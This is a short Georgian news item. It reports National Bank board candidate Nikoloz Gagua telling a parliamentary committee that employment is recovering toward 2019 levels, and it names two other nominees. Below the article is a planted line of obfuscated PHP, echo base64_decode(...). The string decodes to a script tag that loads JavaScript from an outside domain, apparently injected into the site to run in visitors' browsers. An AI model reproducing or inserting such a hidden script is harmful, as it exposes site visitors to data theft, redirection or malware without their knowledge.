celsiusi
ავერსი საქკაბელი
ოფიციალურად, თითქმის ყველა სექტორში ვხედავთ დასაქმებულების ზრდას, - განცხადება ეროვნული ბანკის საბჭოს წევრობის კანდიდატმა ნიკოლოზ გაგუამ პარლამენტის დარგობრივი ეკონომიკისა და ეკონომიკური პოლიტიკის კომიტეტის სხდომაზე გააკეთა.
 
„ოფიციალურად, თითქმის ყველა სექტორში ვხედავთ დასაქმებულების ზრდას, აპრილ-მაისის მაჩვენებლებით. იყო მნიშვნელოვანი კლება 2020-ში, მაგრამ ბევრ სექტორში მონაცემები თითქმის 2019 წლის მაჩვენებელს უბრუნდება. როცა დღეს ეკონომიკური აღდგენის არხებს ვაანალიზებთ, აშკარაა, რომ რაღაც ღონისძიებები საკმაოდ ეფექტური იყო და ის ეკონომიკური ზრდა, რომელიც დაფიქსირდა, ვთვლი, რომ უნდა შენარჩუნდეს. ამ საკითხმა საკმაოდ გადაფარა ვალის თემა, რადგან სწორედ ეს იყო ვალის ზრდა. ის სოციალური ბიზნესის მხარდაჭერის ღონისძიება იყო ვალის ზრდის ერთ-ერთი ფაქტორი“, - განაცხადა გაგუამ.
 
სებ-ის საბჭოს წევრობაზე ნიკოლოზ გაგუასთან ერთად წარდგენილი არიან ეკონომიკის მინისტრის მოადგილე ეკატერინე მიქაბაძე და „გაერთიანებული წყალმომარაგების კომპანიის" ყოფილი ხელმძღვანელი ეკატერინე გალდავა.
1252
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");